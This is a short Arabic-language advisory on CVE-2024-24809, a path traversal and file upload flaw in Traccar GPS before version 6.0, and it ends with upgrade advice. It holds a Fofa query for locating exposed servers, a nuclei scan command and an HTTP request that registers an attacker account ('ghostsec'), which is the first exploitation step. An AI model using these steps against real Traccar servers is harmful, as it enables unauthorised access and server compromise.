
ثغرات حرجة في نظام Traccar GPS تعرّض المستخدمين لهجمات عن بُعد
تراكار (Traccar) هو نظام تتبع GPS مفتوح المصدر. الإصدارات السابقة للإصدار 6.0 معرّضة لثغرة اجتياز المسار (Path Traversal) والرفع غير المقيد لملف من نوع خطير.
نظرًا لأن النظام يسمح بالتسجيل افتراضيًا، يمكن للمهاجمين الحصول على صلاحيات مستخدم عادي عن طريق تسجيل حساب واستغلال هذه الثغرة لرفع ملفات بالبادئة device. تحت
أي مجلد. يمكن للمهاجمين استخدام هذه الثغرة في التصيد الاحتيالي وهجمات البرمجة النصية عبر المواقع (XSS)، وربما تنفيذ أوامر عشوائية على الخادم. يحتوي الإصدار 6.0 على تصحيح لهذه المشكلة.
Fofa query : app="traccar"
nuclei --target {target.com} -t CVE-2024-24809.yaml
POST /api/users HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
{"name": "{{name}}", "email": "{{email}}", "password": "{{password}}", "totpKey": null}
name: "ghostsec"
password: "ghostsec"
email: "[email protected]"
قم بترقية org.traccar:traccar إلى الإصدار 6.0 أو أحدث.